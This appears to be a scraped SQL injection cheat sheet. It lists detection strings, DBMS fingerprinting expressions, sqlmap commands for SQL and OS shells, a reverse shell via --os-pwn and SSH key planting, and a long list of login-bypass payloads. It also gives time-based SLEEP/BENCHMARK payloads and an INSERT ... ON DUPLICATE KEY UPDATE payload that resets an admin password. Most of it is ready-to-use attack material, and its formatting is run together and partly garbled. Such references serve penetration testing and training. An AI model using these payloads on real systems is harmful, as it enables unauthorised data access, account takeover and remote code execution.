Custom injection in UserAgent/Header/Referer/Cookie
Second order injection
Shell
Crawl a website with SQLmap and auto-exploit
Using TOR with SQLmap
Using a proxy with SQLmap
Using Chrome cookie and a Proxy
Using suffix to tamper the injection
General tamper option and tamper's list
SQLmap without SQL injection
Authentication bypass
Authentication Bypass (Raw MD5 SHA1)
Polyglot injection
Routed injection
Insert Statement - ON DUPLICATE KEY UPDATE
WAF Bypass
Entry point detection
Detection of an SQL injection entry point Simple characters
'%27"%22#%23;%3B)Wildcard (*)' # required for XML content
Multiple encoding
%%2727%25%27
Merging characters
`+HERP'||'DERP'+'herp' 'DERP'%20'HERP'%2B'HERP
Logic Testing
page.asp?id=1or1=1-- truepage.asp?id=1' or 1=1 -- truepage.asp?id=1" or 1=1 -- truepage.asp?id=1 and 1=2 -- false
Weird characters
Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) wastransformed into U+0022 QUOTATION MARK (")Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) wastransformed into U+0027 APOSTROPHE (')
DBMS Identification
["conv('a',16,2)=conv('a',16,2)","MYSQL"],["connection_id()=connection_id()","MYSQL"],["crc32('MySQL')=crc32('MySQL')","MYSQL"],["BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123)","MSSQL"],["@@CONNECTIONS>0","MSSQL"],["@@CONNECTIONS=@@CONNECTIONS","MSSQL"],["@@CPU_BUSY=@@CPU_BUSY","MSSQL"],["USER_ID(1)=USER_ID(1)","MSSQL"],["ROWNUM=ROWNUM","ORACLE"],["RAWTOHEX('AB')=RAWTOHEX('AB')","ORACLE"],["LNNVL(0=123)","ORACLE"],["5::int=5","POSTGRESQL"],["5::integer=5","POSTGRESQL"],["pg_client_encoding()=pg_client_encoding()","POSTGRESQL"],["get_current_ts_config()=get_current_ts_config()","POSTGRESQL"],["quote_literal(42.5)=quote_literal(42.5)","POSTGRESQL"],["current_database()=current_database()","POSTGRESQL"],["sqlite_version()=sqlite_version()","SQLITE"],["last_insert_rowid()>1","SQLITE"],["last_insert_rowid()=last_insert_rowid()","SQLITE"],["val(cvar(1))=1","MSACCESS"],["IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0","MSACCESS"],["cdbl(1)=cdbl(1)","MSACCESS"],["1337=1337","MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],["'i'='i'","MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],
Custom injection in UserAgent/Header/Referer/Cookie
python sqlmap.py -u "http://example.com"--data "username=admin&password=pass"--headers="x-forwarded-for:127.0.0.1*"The injection is located at the '*'
Second order injection
python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist"-v 3sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php"-D "joomla"-dbs
Shell
SQL Shellpython sqlmap.py -u "http://example.com/?id=1"-p id --sql-shellSimple Shellpython sqlmap.py -u "http://example.com/?id=1"-p id --os-shellDropping a reverse-shell / meterpreterpython sqlmap.py -u "http://example.com/?id=1"-p id --os-pwnSSH Shell by dropping an SSH keypython sqlmap.py -u "http://example.com/?id=1" -p id --file-write=/root/.ssh/id_rsa.pub --file-destination=/home/user/.ssh/
Crawl a website with SQLmap and auto-exploit
sqlmap -u "http://example.com/"--crawl=1--random-agent --batch --forms --threads=5--level=5--risk=3--batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers--crawl = how deep you want to crawl a site--forms = Parse and test forms
'-'' ''&''^''*'' or 1=1 limit 1 -- -+'="or'' or ''-'' or '' '' or ''&'' or ''^'' or ''*''-||0'"-||0""-""""&""^""*"'--'"--"'--'/"--"" or ""-"" or "" "" or ""&"" or ""^"" or ""*"or true--" or true--' or true--") or true--') or true--'or'x'='x') or ('x')=('x')) or (('x'))=(('x" or "x"="x") or ("x")=("x")) or (("x"))=(("xor 2 like 2or 1=1or 1=1--or 1=1#or 1=1/*admin'--admin' -- -admin' #admin'/*admin'or'2'LIKE'1admin'or2LIKE2--admin' or 2 LIKE 2#admin') or2LIKE2#admin') or 2 LIKE 2--admin') or ('2'LIKE'2admin') or ('2'LIKE'2'#admin') or ('2' LIKE '2'/*admin'or'1'='1admin'or'1'='1'--admin' or '1'='1'#admin'or'1'='1'/*admin'or 1=1 or ''='admin' or 1=1admin' or 1=1--admin' or 1=1#admin' or 1=1/*admin') or ('1'='1admin') or ('1'='1'--admin') or ('1'='1'#admin') or ('1'='1'/*admin') or '1'='1admin') or '1'='1'--admin') or '1'='1'#admin') or '1'='1'/*1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055admin" --admin';-- azer admin" #admin"/*admin" or "1"="1admin" or "1"="1"--admin" or "1"="1"#admin" or "1"="1"/*admin"or 1=1 or ""="admin" or 1=1admin" or 1=1--admin" or 1=1#admin" or 1=1/*admin") or ("1"="1admin") or ("1"="1"--admin") or ("1"="1"#admin") or ("1"="1"/*admin") or "1"="1admin") or "1"="1"--admin") or "1"="1"#admin") or "1"="1"/*1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
Authentication Bypass (Raw MD5 SHA1)
When a raw md5 is used, the pass will be queried as a simple string, not a hexstring.
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*//* MySQL only */IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/
Routed injection
admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'
Insert Statement - ON DUPLICATE KEY UPDATE
ON DUPLICATE KEY UPDATE keywords is used to tell MySQL what to do when the application tries to insert a row that already exists in the table. We can use this to change the admin password by:
Inject using payload: attacker_dummy@example.com", "bcrypt_hash_of_qwerty"), ("admin@example.com", "bcrypt_hash_of_qwerty") ON DUPLICATE KEY UPDATE password="bcrypt_hash_of_qwerty" --
The query would look like this:INSERT INTO users (email, password) VALUES ("attacker_dummy@example.com", "bcrypt_hash_of_qwerty"), ("admin@example.com", "bcrypt_hash_of_qwerty") ON DUPLICATE KEY UPDATE password="bcrypt_hash_of_qwerty" -- ", "bcrypt_hash_of_your_password_input");
This query will insert a row for the user “attacker_dummy@example.com”. It will also insert a row for the user “admin@example.com”.
Because this row already exists, the ON DUPLICATE KEY UPDATE keyword tells MySQL to update the `password` column of the already existing row to "bcrypt_hash_of_qwerty".
After this, we can simply authenticate with “admin@example.com” and the password “qwerty”!
WAF Bypass
White spaces alternatives
No Space (%20) - bypass using whitespace alternatives